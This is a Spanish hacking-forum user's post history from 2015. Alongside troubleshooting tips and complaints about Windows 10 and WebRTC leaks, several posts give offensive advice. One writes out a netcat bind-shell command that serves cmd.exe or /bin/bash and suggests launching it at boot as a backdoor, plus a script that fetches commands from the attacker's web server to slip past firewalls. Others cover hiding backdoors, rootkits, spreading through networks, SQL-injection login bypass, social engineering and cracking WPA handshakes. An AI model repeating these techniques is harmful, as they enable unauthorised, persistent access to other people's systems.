Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - c0n

#1
Pues si el archivo esta ahi mírate los permisos.
#2
Esto es interesante. Gracias por compartirlo.

De dónde lo has sacado? Hay algun paper?

Un saludo

EDIT: He encontrado un par, por si a alguien más también no lo conocia y le interesa:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 2014
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 2010
#3
Comprueba que un firewall no esté impediendo la conexión.

Comprueba que el servicio esté corriendo, y que si lo está que el puerto en el que escucha es 4780.
     en windows, desde el servidor en si: corre 'netstat -a'
     en linux corre 'ss -antp'

Comprueba que no te hayas equivocado de directorio... pides la raiz y quizá está en otra carpeta. Mirate los archivos del servidor en el apache o en lo que sea que corra. /var/www/html en linux, en windows no lo sé.

Un saludo



#4

Ya pueden soltar billetes ya, a ver cómo coño arreglan esto ahora.

Es muy triste que los clientes paguen la mala gestión de una empresa. No es un banco de las bahamas, pero coño, en un sitio de estos la información es bastante sensible. Referente a los suicidios supongo que es una estrategia para meter presión, pues sinceramente, dudo que alguien se suicide por el mero hecho de haber hecho algo sin estar forzado a ello.

Alguien sabe como la petaron?

Salu2
#5
Dudas y pedidos generales / Re:Webpentesting
Agosto 24, 2015, 11:08:44 AM
Buenas,

La clave para una vida fácil es entrar por la puerta más ancha o amplia. Si no nos cuentas qué otras puertas, o servicios corre el sistema, no se te puede aconsejar nada. Mira que servicios corre y busca vulnerabilidades.

Hacer diccionarios personalizados es un método muy útil que ahorra mucho tiempo. Que yo sepa existe un script en ruby que además es una spider. Crawlea por un servidor web y crea un diccionario a partir de la información que analiza del sitio. El unico requisito es obviamente la necesidad de información. Qué sabes del admin?

La aplicación por si interesa se llama Cewl.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Otra alternativa quizá factible es bypassear el login con SQL injection.

La otra, si tienes un correo del admin, es la ingenieria social.

Un saludo.
#6
Dudas y pedidos generales / Re:Backdoor en linux
Agosto 19, 2015, 06:00:41 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por la respuesta, algo así a lo que comentas como shell voladora, me gustaría si te es posible me ampliaras el proceso a grandes rasgos tendría que realizar para esto?.

Basicamente se bindea a un puerto un pequeño programa que espera a que se conecten a él. Cuando lo hacen le entrega una shell al que se ha conectado. (O al revés) La implementación más facil, (y vieja) es usando lo que se llama, por su utilidad, la navaja suiza del hacker: netcat. Se han desarrollado desde entonces varias variantes encryptadas, tanto tráfico como el ejecutable. Pero la base sigue más o menos siendo la misma y ésta se sigue usando sin duda, actualmente. Para que pruebes o te hagas una idea te comento el proceso que como verás es muy simple. Descargamos nc.exe ; o 'apt-get install nc-traditional' en linux.

La sintaxis es más que simple:
nc -vlp5555 -e "cmd.exe"     // -v verbose, explicar datos. -l LISTEN, escuchar, esperar a que se conecten a él. -pNNNN puerto. -e "programa.exe" aqui ponemos lo que se le "mandará" a quien se conecte. En este caso cmd.exe. Para linux pon /bin/bash
Para conectarte seria simplemente
nc (-v) ip puerto.

Por lo tanto si somos capaces de ejecutar cuando el sistema arranque esto, podriamos obtener una shell remota cuando quisieramos.

El programa que ves en la página que has puesto hace lo mismo, puedes también usarlo.

También puedes montar un script -si sabes algun lenguaje de scripting(python, ruby,perl)- que obtenga una cadena de texto de un servidor http tuyo própio, y ejecute como comando del sistema ésta. En este caso seria tráfico por el puerto 80, por lo tanto evitaria la mayoria de los firewalls. Y levantaria pocas sospechas.

Hay muchas otras miles maneras, como te he dicho puedes hacer lo que quieras. Si andas totalmente perdido mirate algun tutorial de netcat. Es lo más básico en este tema, pero te ayudará a entender. Y la complejidad la marca cada uno, la base es la misma.

Un saludo


#7
Cada vez veo más imposible que una persona en su sano juicio instale esta BASURA en su pc. Entre la "recolección de información", el compartir las contraseñas de las redes, el puto keylogger que manda a microsoft todo, y si no es version de pago no lo puedes desactivar!... que no escojas lo que instales; update obligado...... y ahora esto? Hay que ser gilipollas para instalar windows 10, pero con todas las letras.
#8
Pues añade los espacios..
"palabra" => ' palabra '

MagoAstral tan solo ha demostrado el concepto.
#9
Dudas y pedidos generales / Re:Backdoor en linux
Agosto 13, 2015, 10:37:44 PM
La verdad no soy ningun experto, pero tienes un amplio conjunto de opciones. Dependiendo de lo sigiloso que puedas ser elige. Puedes añadir un servicio que espere a que se conecten a él, y al hacerlo que te mande una shell.

Problema: una shell voladora es facil de ver para la mayoria de adminsitradores/ o sistemas de detección. Solución: esta conexión puede ser, evidentmente encriptada para facilitar la tarea. Otro problema es que se conecte otro; solución ... por ejemplo que solo mande la shell después de recibir unos caracteres arbitrarios y evidentmente predeterminados por ti.
Para que sea menos visible el puerto escuchando... algo muy ruidoso, y encima en un puerto que nunca ha sido usado... puedes hacer que solo escuche en intervalos determinados de tiempo.

Montar un script que cambie permisos de una cuenta sin credenciales a una determinada hora para que puedas conectarte sin llamar la atención... etc etc

Otra solución seria incrustar un rootkit, algo más complejo de programar, pero al trabajar desde memoria el control que tienes es masivo. Ocultar procesos y demás desde aquí es algo mucho más manejable seria bastante invisible. Algunos se inyectan en las capas más internas.

Depende del uso que se le de a la máquina puedes buscar maneras de expandir y propagar tu control sobre el entorno y la red. Infectar puertos usb, redes internas, redes wireless cercanos...

Como ves puedes hacer mil cosas, lo bonito de esto es que es un proceso bastante creativo.

Un saludo
#10
Back-end / Re:Ver ip real a través de proxy o vpn
Agosto 09, 2015, 01:18:18 PM
Tras instalar 'Disable WebRTC' ayer, hoy al despertarme me he dado cuenta de que el addon en firefox ha dejado de funcionar. Aparece como activo pero sigue leakeando(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) Ayer funcionaba. Que feo se esta poniendo esto...

Alguien lo usa y le funciona??  Creo que es momento de cambiar de navegador. Alguien sugiere alguno open? Cómo está Iceweasel?

Salu2
#11
Back-end / Re:Ver ip real a través de proxy o vpn
Agosto 08, 2015, 10:48:51 PM
"Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that."
!!!!
Y sin decir nada!

Para desactivar el WebRTC => No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Salu2
#12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[¿Qué haríais vosotros?

  by rand0m para Underc0de - Distribuido bajo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Click para ver los detalles).
Si me fuera la vida en ello y tubiera poco tiempo yo robaria el 4-way handshake spoofeando y crackearia la pass con algun ring de computadores en cluster. Puedes alquilar un super-cluster de pc's por unos 20 dolares el minuto. Y para crackear una wpa de un domicilio o un negocio dude que tarde más de medio minuto.  Así que si es tan urgente...  10 dólares y la tienes. En caso de tener una botnet te los ahorras...

Salu2


#13
Estos posts en forma de relato son cojonudos. Me pregunto qué otros sitios institucionales de allí tienen la misma implementación...

Kudos hdbreaker
#14


Windows 10 botnet
#15
Wargames y retos / Re:Consigue el flag
Agosto 06, 2015, 03:22:04 AM
Se ha caido
#16
Añado un sitio cojonudo lleno de boot2root

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#17
48
#18
Ingeniería Inversa / Re:Curso Cracking by Raton
Agosto 03, 2015, 07:04:09 PM
Gracias por compartir.

Faltan los crackmes de los capitulos 3-12 incluidos. Alguien los tiene?

#19
transmission ftw
#20
Si no recuerdo mal hasta hace muy muy poco los mensajes de watsapp estaban cifrados, si, pero con la misma llave. Recuerdo ver muy recientemente varias tools que rompian este cifrado.